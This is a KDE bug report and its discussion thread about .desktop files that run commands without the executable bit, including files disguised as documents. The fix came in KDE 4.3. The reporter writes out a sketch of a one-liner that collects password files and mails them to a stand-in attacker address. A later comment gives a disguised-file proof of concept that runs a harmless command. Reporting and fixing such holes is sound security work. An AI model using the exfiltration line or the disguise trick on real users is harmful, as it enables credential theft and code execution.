Bug 73865

Summary: .desktop files present a security risk
Product: [Unmaintained] kdelibs Reporter: Daniel Quinn <expendable.0>
Component: kdecoreAssignee: kdelibs bugs <kdelibs-bugs>
Status: RESOLVED FIXED    
Severity: critical CC: andresbajotierra, anselmolsm, fbafelipe, grundleborg, michal.vyskocil, mpyne, rafl
Priority: NOR    
Version: unspecified   
Target Milestone: ---   
Platform: unspecified   
OS: Linux   
Latest Commit: Version Fixed In:
Sentry Crash Report:

Description Daniel Quinn 2004-01-31 05:23:19 UTC 
Version:           v1.9.8 (using KDE 3.2.0 RC1, Gentoo)
Compiler:          gcc version 3.3.2 20031218 (Gentoo Linux 3.3.2-r5, propolice-3.3-7)
OS:          Linux (i686) release 2.4.24

experimenting with the possible distribution of viruses or just plain mean tricks etc, i thought i'd see how far i could get with a .desktop file.  i created a link to an application on the desktop and used "echo 'stuff' > ~/filename" as the command.  then i emailed the file to myself.

opening the file in kmail was as easy as click, save and then click the file now saved to my desktop.  granted, it's not a lethal as the "autoplay" 'feature' in outlook express, but it is worriesome that one can execute emailed code without having to manually set the +x bit.

i think it'd be better if .desktop files had to be executeable in order to run like that, otherwise, someone might put something a little meaner inside like:

"find ~ -name '*password*' -print0 | xargs -0 cat | <something to do with /usr/sbin/sendmail> evilguy@hotmail.com

i'm still a newbie at one liners, but the idea still stands.  it's not like it'd spread very well (for now) but the more people that use kde, the more of a problem this could become.
Comment 1 Chris Howells 2006-05-30 01:31:47 UTC 
I think this is best assigned to KMail.
Comment 2 Rafael Leal 2009-02-18 11:39:16 UTC 
There's been a lot of discussion about this in the last couple of days:
http://www.geekzone.co.nz/foobar/6229
http://lwn.net/Articles/319072/

This is a serious issue. If Freedesktop.org won't take a step, KDE should be non-compliant on this.

+x seems to be the best solution.
Comment 3 Rafael Leal 2009-02-18 11:53:24 UTC 
And it should not be assigned specifically to Kmail, rather to KDE itself.
Comment 4 Allen Winter 2009-02-21 15:24:10 UTC 
yes, patches are being developed against kdelibs, klauncher and krun.

so i'm reassigning to kdelibs and changing the priority to critical.
Comment 5 George Goldberg 2009-03-19 14:10:28 UTC 
Changing the assignee appropriately.
Comment 6 Michael Pyne 2009-03-20 02:27:12 UTC 
This is fixed in KDE 4.3, I'm queuing up patches to be backported to KDE 4.2 (although given my real job I'm not sure if I'll make it for KDE 4.2.2 as I want good review).
Comment 7 Felipe 2009-04-07 19:50:15 UTC 
The file is executed even if it does not have the .desktop extension, it just need the "[Desktop Entry]". I don't know why, but I made some tests, with a odt it opened with OpenOffice (as it should). But then I tried this:

I created a file named "test.doc", with this content:
"[Desktop Entry]
Type=Application
Name=test.doc
Exec=echo "foo" > test
Icon=/usr/share/icons/hicolor/48x48/apps/ooo-writer.png"

Then I double click the created file (worked in Dolphin and in Konqueror) and it executed the command (this file "test" was created in my home).
Comment 8 Michael Pyne 2009-05-10 02:42:21 UTC 
Felipe, I know it's taken awhile for me to respond but I just tried your testcase on KDE trunk and it brought up the warning dialog instead of just executing.  What version of KDE did you test this with?
Comment 9 Felipe 2009-05-10 06:25:51 UTC 
I tested it with KDE 4.2.2.
Comment 10 Michael Pyne 2009-05-10 17:30:19 UTC 
The patches never got backported to KDE 4.2, due to the risk of breaking 4.2 so this is expected behavior.  And since the only reason the bug was left open was in case we decide to backport I'm going to go ahead and close it.
Comment 11 Dario Andres 2009-08-07 21:55:03 UTC 
Bug 202626 is asking for some changes in the implement security methods for .desktop files.